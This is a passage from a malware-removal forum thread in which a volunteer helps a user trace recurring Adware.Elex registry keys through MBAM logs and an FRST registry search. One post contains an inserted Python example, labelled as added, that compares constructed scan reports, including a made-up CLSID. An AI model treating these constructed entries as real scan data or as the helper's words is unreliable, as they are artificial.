#11 vish_arya

  • Topic Starter
  • Members
  • 8 posts

Posted 06 April 2017 - 10:33 AM

I have attached the latest MBAM scan log.

Attached Files



#12 nasdaq

  • Malware Response Team
  • 40,213 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 07 April 2017 - 08:22 AM

The report shows that the bad keys were quarantined.

Do the keys re-spawn each time you execute Malwarebytes?
Do they have the same number in the {...}, such as {66397E66-B196-4A80-B328-C9EB4C12279A}, or some other string?
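The question above (do the same keys come back, and with the same GUID, or does a fresh one appear each time?) is what separates leftover keys from something actively re-creating them, and it is easiest to answer by comparing detection reports from two scans. Below is an added example that does that comparison; it is not code from this thread and not Malwarebytes' own tooling. The two report texts are constructed and only loosely modelled on the "threat, location, action" columns of an MBAM report: the CLSID {66397E66-B196-4A80-B328-C9EB4C12279A} and the StartupApproved\Run value name come from this thread, while the second CLSID is made up for the comparison.

```python
"""Compare two anti-malware scan reports to tell re-detected registry
entries from newly generated ones.

Added example: not code from the thread and not Malwarebytes' tooling.
Report lines are CONSTRUCTED in a 'threat, location, action' layout.
"""
import re

GUID_RE = re.compile(r"\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}", re.I)

# Constructed first scan. The SID, the value name and the first CLSID are
# taken from the thread; the report layout itself is simplified.
FIRST_SCAN = r"""
Adware.Elex, HKU\S-1-5-21-2110739183-721557999-1904875066-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUN|V2OND97EM5, Quarantined
Adware.Elex, HKLM\SOFTWARE\CLASSES\CLSID\{66397E66-B196-4A80-B328-C9EB4C12279A}, Quarantined
PUP.Optional.SweetPage, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Quarantined
"""

# Constructed second scan, a few days later: two entries are back unchanged,
# the sweet-page entry is gone, and one CLSID (made up here) is new.
SECOND_SCAN = r"""
Adware.Elex, HKU\S-1-5-21-2110739183-721557999-1904875066-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUN|V2OND97EM5, Quarantined
Adware.Elex, HKLM\SOFTWARE\CLASSES\CLSID\{66397E66-B196-4A80-B328-C9EB4C12279A}, Quarantined
Adware.Elex, HKLM\SOFTWARE\CLASSES\CLSID\{0F3A9C21-5D7E-4B11-9E2A-000000000001}, Quarantined
"""


def parse_report(text: str) -> list:
    """Return (threat, location, action) tuples, one per non-empty line."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        threat, location, action = (p.strip() for p in line.split(",", 2))
        rows.append((threat, location, action))
    return rows


def compare_reports(first: str, second: str) -> dict:
    """Split the second scan's locations into recurring / new / cleared
    relative to the first scan."""
    before = {loc for _, loc, _ in parse_report(first)}
    after = {loc for _, loc, _ in parse_report(second)}
    return {
        "recurring": sorted(before & after),   # same key detected again
        "new": sorted(after - before),         # something generated a new one
        "cleared": sorted(before - after),     # did not come back
    }


def recurring_guids(first: str, second: str) -> set:
    """GUIDs that appear in both scans: the very same CLSID re-detected,
    as opposed to a freshly generated identifier."""
    result = compare_reports(first, second)
    return {m.group(0).upper()
            for loc in result["recurring"]
            for m in GUID_RE.finditer(loc)}


if __name__ == "__main__":
    for kind, locs in compare_reports(FIRST_SCAN, SECOND_SCAN).items():
        print(f"{kind}:")
        for loc in locs:
            print("   ", loc)
    print("same GUID both times:", recurring_guids(FIRST_SCAN, SECOND_SCAN))
```

A location that recurs with an identical GUID points at a leftover that the clean-up never fully removed (or that a saved report keeps re-listing); a new GUID each scan means something on the system is still writing keys, and the search for that something, as done with the FRST registry search in this thread, comes next.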

#13 vish_arya

  • Topic Starter
  • Members
  • 8 posts

Posted 07 April 2017 - 08:12 PM

I have attached two previous MBAM scan logs from when I removed Adware.Elex.

MBAM only shows scan logs after removing the virus. Nothing shows up if you just scan and don't take any actions on the results. Either way, I ran a scan today and no threat was detected by any of my anti-malware programs. So I don't know when it will return.

Attached Files



#14 nasdaq

  • Malware Response Team
  • 40,213 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 08 April 2017 - 07:41 AM

Let's see what we can find in the Registry.

Farbar Recovery Scan Tool (FRST) - Registry Search
Follow the instructions below to download and execute a Registry search on your system with FRST, and provide the log in your next reply.
  • Right-click on the executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • In the Search text area, copy and paste the following:
Milimili
  • Once done, click on the Search Registry button and wait for FRST to finish the search;
  • On completion, a log will open in Notepad. Copy and paste its content in your next reply;


#15 vish_arya

  • Topic Starter
  • Members
  • 8 posts

Posted 08 April 2017 - 11:48 AM

Found nothing.

Anyway, thanks for saving my job; I am really grateful to you! All my malware scanners are showing "no threats found" and my laptop is working much better. So we can either wait for a 5-day window again to check if it shows up again, or we can just close this forum here based on your discretion.

Thank you !! :)

Attached Files





